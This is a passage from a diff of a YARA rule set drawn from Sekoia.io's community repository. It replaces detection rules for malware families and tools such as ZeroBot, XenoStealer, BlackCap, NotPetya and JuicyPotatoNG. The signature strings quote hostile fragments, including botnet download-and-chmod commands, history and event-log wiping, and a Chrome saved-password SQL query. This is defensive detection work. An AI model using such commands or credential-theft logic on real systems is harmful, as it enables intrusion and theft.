-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_scanbox_framework_not_obfuscated.yar#L1-L23"
+		reference = "https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_zerobot_dec22.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "52779571eb4e68442542a1c4cff58d5b00a264bb567396126cd93dc4ec4eda45"
+		logic_hash = "0f4faba9873fa360615b20bc637ecb40f56e6c7f65153f61a762e378320f94c1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247623,58 +247730,70 @@ rule SEKOIA_Apt_Scanbox_Framework_Not_Obfuscated : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "php?m=a&data="
-		$ = "php?m=p&data="
-		$ = ".fun.split_data = function"
-		$ = ".php?data="
-		$ = ".php?m=b"
-		$ = "basic.apipath"
-		$ = ".info.seed ="
-		$ = "loadjs ="
-		$ = "info.color = screen.colorDepth"
+		$str01 = "rm -rf "
+		$str02 = "wget http://"
+		$str03 = "curl -O http://"
+		$str04 = "tftp"
+		$str05 = "-c get"
+		$str06 = "ftpget -v -u anonymous -P"
+		$str07 = "chmod 777"
+		$str08 = "nohup"
+		$str09 = "/dev/null 2>&1 &"
+		$str10 = "zero."
+		$str11 = "ppc64le"
+		$str12 = "riscv64"
+		$str13 = "s390x"
+		$str14 = "rm -rf ~/.bash_history"
+		$str15 = "history -c"
 
 	condition:
-		5 of them and filesize < 500KB
+		11 of ( $str* ) and filesize < 10KB
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Usbstealer : FILE
+rule SEKOIA_Storm_1811_Files_Dat
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
 		author = "Sekoia.io"
-		id = "37d5becc-f1c3-4400-bc10-cd6036d4dbb1"
-		date = "2023-05-15"
+		id = "8b14f276-0c39-422b-9b19-d96b139a7ae8"
+		date = "2024-06-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_usbstealer.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/storm_1811_files_dat.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a600f17bce9159b581c234cc101d1a0d093954fc9c79052dbca5451714fd7502"
+		logic_hash = "d1d5b76671cefe8b876ca8df50205a04ebbcd973f115919b901f6a7946492904"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
-		$ = "State USB" ascii wide
-		$ = "DefaultNameDevice" ascii wide
-		$ = "SerialNumber" ascii wide
+		$s1 = "RuntimeBroker" ascii fullword
+		$s2 = "InstallSpamFilters" ascii fullword
+		$s3 = "newfile333.txt" ascii fullword
+		$s4 = "Installing spam filter kb_outlook" ascii fullword
+		$s5 = "s.zip" ascii fullword
+		$s6 = "Update completed" ascii fullword
+		$s7 = "Updates installed" ascii fullword
+		$s8 = "update_log.tgz uploaded ok" ascii fullword
+		$s9 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii fullword
+		$s10 = "runtimebroker_connect" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		5 of them
 }
-rule SEKOIA_Apt_Backdoordiplomaty_Custommerlinagent_Strings : FILE
+rule SEKOIA_Tool_3Proxy_Strings : FILE
 {
 	meta:
-		description = "Detects custom variant of Merlin agent used by BackdoorDiplomaty"
+		description = "Detects 3proxy based on strings"
 		author = "Sekoia.io"
-		id = "965693ba-93b8-4c52-9292-957884411968"
-		date = "2024-06-06"
+		id = "daf6cd97-8033-4bfd-88b5-41c06eb417b0"
+		date = "2024-03-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_backdoordiplomaty_custommerlinagent_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_3proxy_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "31d13e234dc3f68f6826a5310ac38693750f896318249d04a31c5e6c8d5eba91"
+		logic_hash = "f1d9bea9975af9bfa3f1a8cbf2c1d65fe1d39f303d5dbe6131887653cbbe7021"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247682,26 +247801,25 @@ rule SEKOIA_Apt_Backdoordiplomaty_Custommerlinagent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "agent.GetSpecificID"
-		$ = "agent.ExecuteCommand"
-		$ = "agent.getClient"
-		$ = "agent.SignalListen"
+		$ = "of 3proxy-"
+		$ = "-pPORT - service port to accept connections"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 10MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 500KB and all of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_9 : FILE
+
+rule SEKOIA_Infostealer_Win_Irontiger_Chrome_Stealer : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect the chrome_stealer malware"
 		author = "Sekoia.io"
-		id = "e4283d6e-d829-4f21-ba60-9e6232519e54"
-		date = "2023-02-03"
+		id = "8c5c3ed0-e1ea-4079-b330-ace8724bff2a"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_9.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_irontiger_chrome_stealer.yar#L3-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "deb0773e6300ed0f4c099359731812216390017eaf8de678b2a5ed237906f03f"
+		logic_hash = "dfddebf9623661508e993541106d4dcbb2270b311b2902567bd309810aff58dd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247709,86 +247827,90 @@ rule SEKOIA_Generic_Sharpshooter_Payload_9 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "shell.Environment(\"Process\").Item(\"COMPLUS_Version\")"
-		$ = "(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)"
-		$ = "DebugPrint Err.Description"
+		$ = "passwords.txt"
+		$ = "CryptUnprotectData: 0x%08x"
+		$ = "cookies.txt"
+		$ = "decrypt to %s"
+		$ = ".\\chromedb_tmp" wide ascii
+		$ = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS;"
+		$ = "decrypt successful!"
+		$ = "url: %s"
+		$ = "user: %s"
+		$ = "pass: %s"
+		$ = "aes key:"
+		$ = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
+		$ = "password file %s" wide
+		$ = "cookies file %s" wide
+		$ = "keyfile: %s" wide
 
 	condition:
-		all of them and filesize < 2MB
+		( uint16( 0 ) == 0x5A4D and all of them ) or pe.imphash ( ) == "e862f5a6671f9dbd6f53d3d557e568f0"
 }
-rule SEKOIA_Downloader_Win_Donot
+rule SEKOIA_Tool_Juicypotatong_Strings : FILE
 {
 	meta:
-		description = "Detect the DoNot's downloader malware. There are big binaries in downloader strings."
+		description = "Detects JuicyPotatoNG"
 		author = "Sekoia.io"
-		id = "31b153cc-a4b9-40a0-8bcb-ce1370645b4b"
-		date = "2023-03-20"
+		id = "4634251b-ea41-4f58-aabd-db83ccf4edaa"
+		date = "2023-06-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_donot.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_juicypotatong_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f6a03e6cfda74c1fbb1e8939a66735498d604a821b8b51492c2c5c6a46a38b6e"
+		logic_hash = "7014b206b293c8254304d97bec7b367c6039566f60511a51d4a41d3e1ed98612"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "001100000011000100110001001100000011000000110000001100010011000100110000001100010011000100110000001100010011000100110000001100010011"
-		$ = "01010011011011110110011001110100011101110110000101110010011001010101110001001101011010010110001101110010011011110111001101101111011001100111010001011100010101110110100101101110011001000110111101110111011100110101110001000011011101010111001001110010011001010110111001110100010101100110010101110010011100110110100101101111011011100101110001010101011011100110100101101110011100110111010001100001011011000110110000000000"
-		$ = "0101110001110011011110010111001101110100011001010110110100110011001100100101110001110010011101010110111001100100011011000110110000110011001100100010111001100101011110000110010100000000"
+		$ = "[!] CryptStringToBinaryW failed with error code %d" ascii
+		$ = "-b : Bruteforce all CLSIDs. !ALERT:" ascii
+		$ = "[-] CreateProcessWithTokenW Failed to create proc: %d" ascii
 
 	condition:
-		1 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Loader_Win_Revil_Loader
+rule SEKOIA_Apt_Darkpink_Sample : FILE
 {
 	meta:
-		description = "Detect the REvil loader using DDL side loading. The detected ressource is a legitimate executable used to load the malicious .dll containing the ransomware"
+		description = "Detects two parts of cmd.exe /c "
 		author = "Sekoia.io"
-		id = "3c293e87-e2d7-475a-9536-8b991961fa11"
-		date = "2021-07-19"
+		id = "91b4c64a-7622-4f03-bd3f-9fe56f01dfbe"
+		date = "2023-06-05"
 		modified = "2024-12-19"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_revil_loader.yar#L4-L34"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_darkpink_sample.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "15680c5e5d801d65e581869ad88d89863c8a51e3f94a3d2f37c02c5fd14df07f"
+		hash = "8dc3f6179120f03fd6cb2299dbc94425451d84d6852b801a313a39e9df5d9b1a"
+		logic_hash = "c9d3952036bffe2d924ea553fd53f8b6f0b3f16f1060fbde69496c800d4d5ad9"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
-		hash2 = "50416e50797cf88a48d086e718c003e2d10c3847b1a251669d6f10f8d3546e03"
-		hash3 = "66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8"
-		hash4 = "81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471"
-		hash5 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
-		hash6 = "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e"
-		hash7 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
-		hash8 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
 
 	strings:
-		$crypto = ".\\crypto\\" ascii
-		$dropped_name1 = "MsMpEng.exe" wide
-		$dropped_name2 = "mpsvc.dll" ascii
+		$cmd_xor_part_1 = {DF 00 A1 00 E4 00 F0 00 4B 00 3A 00 D1 00 C4 00}
+		$cmd_xor_part_2 = {bc 00 cc 00 80 00 d0 00 64 00 59 00 F1 00 E6 00 FD 00 83 00 C6}
 
 	condition:
-		all of ( $dropped_name* ) and #crypto > 100 and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a" )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Pe_Stealer_Axilestealer_Strings : FILE
+rule SEKOIA_Infostealer_Win_Xenostealer_Strings : FILE
 {
 	meta:
-		description = "AxileStealer strings"
+		description = "Finds XenoStealer standalone samples based on the strings"
 		author = "Sekoia.io"
-		id = "412bfc3e-6bb7-4b0d-8bb3-96eae0cc9782"
-		date = "2023-12-13"
+		id = "0a41788b-1fa7-44ff-af85-9c1ff1892aad"
+		date = "2024-10-30"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/pe_stealer_axilestealer_strings.yar#L1-L28"
+		reference = "https://github.com/moom825/XenoStealer/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_xenostealer_strings.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "829b80c07ed4d9439d66956dbb106aa0cc9961dd2e5c05ffbe6c67e516613590"
+		hash = "b74733d68e95220ab0630a68ddf973b0c959fd421628e639c1b91e465ba9299b"
+		logic_hash = "1c48b15b8e9648c1c4d2f9c0a9ee3f4c48605fa44772b87a03ad81923e5adf15"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247796,34 +247918,41 @@ rule SEKOIA_Pe_Stealer_Axilestealer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "http://ip-api.com/line/?fields=query,country,countryCode,city,regionName,zip,isp" wide
-		$s2 = "Axile.su" wide
-		$s3 = "Unknown Tokens.txt" wide
-		$a1 = "[ <b>General</b> ]" wide
-		$a2 = "[ <b>Browsers</b> ]" wide
-		$a3 = "[ <b>Wallets</b> ]" wide
-		$a4 = "[ <b>Messengers</b> ]" wide
-		$a5 = "[ <b>Applications</b> ]" wide
-		$a6 = "[ <b>Games</b> ]" wide
-		$a7 = "[ <b>Mails</b> ]" wide
-		$a8 = "[ <b>VPNs</b> ]" wide
-		$a9 = "[ <b>FTPs</b> ]" wide
+		$str01 = "XenoStealer" ascii wide
+		$str02 = "$d05de59c-9ee5-4e7e-abb5-8f2cc3f72cd1" ascii
+		$str03 = "SteamInfo" ascii
+		$str04 = "TelegramInfo" ascii
+		$str05 = "NgrokInfo" ascii
+		$str06 = "pAuthInfo" ascii
+		$str07 = "FoxMailInfo" ascii
+		$str08 = "_hasNitro" ascii
+		$str09 = "_games" ascii
+		$str10 = "_profiles" ascii
+		$str11 = "_cookies" ascii
+		$str12 = "_creditCards" ascii
+		$str13 = "_cryptoExtensions" ascii
+		$str14 = "_passwordManagerExtensions" ascii
+		$str15 = "ChromiumBrowsersLikelyLocations" ascii
+		$str16 = "EdgeCryptoExtensions" ascii
+		$str17 = "ChromePasswordManagerExtensions" ascii
+		$str18 = "GeckoBrowserOptions" ascii
+		$str19 = "get_programFiles" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 200KB and 2 of ( $s* ) and 7 of ( $a* )
+		uint16( 0 ) == 0x5A4D and 15 of them
 }
-rule SEKOIA_Apt_Sandworm_Notpetya_Strings : FILE
+rule SEKOIA_Apt_Muddywater_Powgoop_Loader : FILE
 {
 	meta:
-		description = "Detects NotPetya worm"
+		description = "Detects the loader of PowGoop malware"
 		author = "Sekoia.io"
-		id = "c6021638-1b59-4d20-a29d-95cabf256a28"
-		date = "2022-04-15"
+		id = "716b45e1-9f17-4546-a003-a7c78340d623"
+		date = "2022-01-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_notpetya_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_muddywater_powgoop_loader.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5600071de4b4022a71c48fbcd4b5e47ff6dfa291cc5eac65720bbf763068a6e3"
+		logic_hash = "70f20928d2bbe081f0595ecdbb6dbe58a2f0807032598d88d829513e6d75287f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247831,28 +247960,26 @@ rule SEKOIA_Apt_Sandworm_Notpetya_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "wevtutil cl Security &" wide
-		$ = "wevtutil cl System &" wide
-		$ = "u%s \\%s -accepteula -s" wide
-		$ = "\\\\%ws\\admin$\\%ws" wide
-		$ = "\\\\%s\\admin$" wide
-		$ = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1" wide
+		$s1 = "$d.Add($in[$i]);" ascii wide
+		$s2 = "[System.Text.Encoding]::UTF8.GetString($o);" ascii wide
+		$s3 = "$i+=(1+1)" ascii wide
+		$t = { 24 ?? 3d [1-15] 20 24 ?? 3b ?? ?? ?? 20 24 ?? 3b }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them
+		filesize < 50KB and ( 3 of ( $s* ) or $t in ( filesize -50 .. filesize ) )
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Module : FILE
+rule SEKOIA_Malware_Remcom_Strings : FILE
 {
 	meta:
-		description = "Detects CloudAtlas PowerShower module"
+		description = "Detects RemCom based on strings"
 		author = "Sekoia.io"
-		id = "dd688058-3d5d-46a7-8380-fe961c3327cd"
-		date = "2022-11-30"
+		id = "7a56d55a-2f35-41ef-b7af-259baf215a62"
+		date = "2022-08-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_module.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_remcom_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7542eb882ee44203d806ad936126be2476b6e3a85ad8c93b6fd6c8226fe82617"
+		logic_hash = "a46bb87bf4722303d33707afb19c8d4f209b98a88552363363520536911469ae"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247860,26 +247987,28 @@ rule SEKOIA_Apt_Cloudatlas_Powershower_Module : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$env:temp" ascii wide
-		$ = "foreach($item in $zip.items" ascii wide
-		$ = "echo $result" ascii wide
-		$ = "pass.txt" ascii wide
+		$ = "RemComSvc"
+		$ = "RemCom_stderr"
+		$ = "RemCom_stdin"
+		$ = "\\\\.\\pipe\\%s%s%d"
+		$ = "RemCom_stdout"
+		$ = "\\\\.\\pipe\\RemCom_communicaton"
 
 	condition:
-		all of them and filesize < 10000
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Hacktool_Impacket_Compiled_Binary : FILE
+rule SEKOIA_Apt_Apt28_Htmlsmuggling_Disclosing_Ip : FILE
 {
 	meta:
-		description = "Detects generic PE embbeding impacket"
+		description = "Detects some kind of HTMLSmuggling used by APT28"
 		author = "Sekoia.io"
-		id = "43936dcc-0d74-43dd-996a-c27a28cef283"
-		date = "2022-02-28"
+		id = "57adc227-2b72-457e-a786-97ca1a7300d8"
+		date = "2023-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_impacket_compiled_binary.yar#L1-L36"
+		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt28_htmlsmuggling_disclosing_ip.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "133f9d0103774701894ea884bc2c52840b405fa21acb9ebab615816ec411b0bf"
+		logic_hash = "047d2d5f8d04576b6d57bc599f82406804845a3acb7628e7ad9b56e71e4dfe92"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247887,67 +248016,52 @@ rule SEKOIA_Hacktool_Impacket_Compiled_Binary : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$i1 = "impacket.crypto" fullword
-		$i2 = "impacket.dcerpc" fullword
-		$i3 = "impacket.ese" fullword
-		$i4 = "impacket.hresult_errors" fullword
-		$i5 = "impacket.krb5" fullword
-		$i6 = "impacket.nmb" fullword
-		$i7 = "impacket.nt_errors" fullword
-		$i8 = "impacket.ntlm" fullword
-		$i9 = "impacket.smb" fullword
-		$i10 = "impacket.smb3" fullword
-		$i11 = "impacket.smb3structs" fullword
-		$i12 = "impacket.smbconnection" fullword
-		$i13 = "impacket.spnego" fullword
-		$i14 = "impacket.structure" fullword
-		$i15 = "impacket.system_errors" fullword
-		$i16 = "impacket.tds" fullword
-		$i17 = "impacket.uuid" fullword
-		$i18 = "impacket.version" fullword
-		$i19 = "impacket.winregistry" fullword
-		$py = "PYZ-00.pyz"
+		$s1 = "ipapi.co/json"
+		$s2 = "a.download("
+		$s3 = "a.click("
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 1MB and 3 of ( $i* ) and $py
+		$s1 and $s2 and $s3 and filesize < 5000
 }
-rule SEKOIA_Hafnium_Tarrask_Malware
+rule SEKOIA_Apt_Polonium_Deepcreep_Strings : FILE
 {
 	meta:
-		description = "Hunting rule to look for Tarrask malware"
+		description = "Tries to detect POLONIUM's DeepCreep implant"
 		author = "Sekoia.io"
-		id = "6f1728d6-dc9b-4ea7-8656-2b069ee269a0"
-		date = "2022-04-14"
+		id = "b04af229-2bea-4ee8-9e17-8e4befa06e3a"
+		date = "2022-10-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hafnium_tarrask_malware.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_polonium_deepcreep_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f9309707d25cfe6bccf050f24e14c42b53f3d017916a02eaada74c4782efdd5c"
-		score = 50
-		quality = 76
-		tags = ""
+		logic_hash = "60724d2eb964e2c3681b72bdb732ca640b603af7dc94b4eb6608c77cddb94011"
+		score = 75
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "delete sd success" wide ascii nocase
-		$s2 = "Task successfully registered." wide ascii nocase
+		$ = ";Invoke-Expression -Command '$shortcut =" ascii wide
+		$ = "CreateShortcut($c1" ascii wide
+		$ = "svchostdp.exe" ascii wide
+		$ = "HNlIC91IA==" ascii wide
 
 	condition:
-		all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_13 : FILE
+rule SEKOIA_Infostealer_Win_Blackcap : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Finds BlackCap Grabber samples (Python code obfuscated using Py-Fuscate)"
 		author = "Sekoia.io"
-		id = "2d61d7b8-5348-4cc8-9d41-61799b573e3b"
-		date = "2023-02-03"
+		id = "1aa1fadb-3413-46e2-b733-1ad2134f7be2"
+		date = "2023-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_13.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_blackcap.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fb6b71bf1e89abf872fb3ef02a228f370f0fcc10d5aab70418fe8735283165da"
+		logic_hash = "b826c88d557ea0a516534946ad9531eda1a875cb9c4ddf92d9b98f8c7b86623e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247955,102 +248069,83 @@ rule SEKOIA_Generic_Sharpshooter_Payload_13 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Private Function decodeHex(hex)"
-		$ = "EL.Text = hex "
-		$ = "serialized_obj = serialized_obj & "
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
+		$imp01 = "import asyncio, json, ntpath, random, re, shutil, sqlite3, subprocess, threading, winreg, zipfile, httpx, psutil, win32gui, win32con, pyperclip, base64, requests, ctypes, time" ascii
+		$imp02 = "from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer;from Crypto.Cipher import AES;from PIL import ImageGrab;from win32crypt import CryptUnprotectData" ascii
+		$pyf01 = "import marshal,lzma,gzip,bz2,binascii,zlib;exec(marshal.loads(binascii.a2b_base64(b'YwAAAAAA" ascii
 
 	condition:
-		all of them and filesize < 2MB
+		($imp01 in ( 0 .. 500 ) and $pyf01 in ( @imp01 + 200 .. @imp01 + 1000 ) or $imp02 in ( 0 .. 1000 ) and $pyf01 in ( @imp02 + 100 .. @imp02 + 500 ) ) and filesize > 100KB and filesize < 500KB
 }
-
-rule SEKOIA_Apt_Darkpink_Loader_Decryptionroutine : FILE
+rule SEKOIA_Recotool_Adfind_Strings : FILE
 {
 	meta:
-		description = "Detects decryption routine of dark pink loader"
+		description = "Detects Adfind utility based on strings"
 		author = "Sekoia.io"
-		id = "fefc7b2f-eecc-49dc-84bc-24c45e9ea8f0"
-		date = "2023-01-17"
+		id = "afca88ef-756a-4b2b-91d7-d18d730e7074"
+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_darkpink_loader_decryptionroutine.yar#L4-L49"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/recotool_adfind_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fe2726b77c293fc2aa19216025cfa2b4cd0c5194730cbc57a1fcceb6f6198977"
+		logic_hash = "cc1e1dceff28136082f19cebc7584ba08c9006b964e37fc3fda91bc0b41906dc"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hashs = "3f38860d0f6f0ff1b65219379f8793383cba85b11de1c853192fb2d2ba99e481"
-		hashs = "b3f1d6366ebc184f634a240c838b39d729c28b8718b0b9ca6be988a7e446ec42"
 
 	strings:
-		$chunk_1 = {
-        8A 08
-        40
-        84 C9
-        75 ??
-        6A 00
-        2B C2
-        50
-        53
-        56
-        E8 ?? ?? ?? ??
-        8A 88 ?? ?? ?? ??
-        30 0C 3E
-        83 C6 01
-        83 D3 00
-        78 ??
-        7F ??
-        81 FE ?? ?? ?? ??
-        72 ??
-        55
-        }
+		$ = "Find all person objects on cn=ab container of local ADAM instance"
+		$ = "IPv6 IP address w/ port is specified [address]:port"
+		$ = "Search Global Catalog (port 3268)."
+		$ = "~~~ADCSV~~~"
+		$ = "adfind -b dc="
 
 	condition:
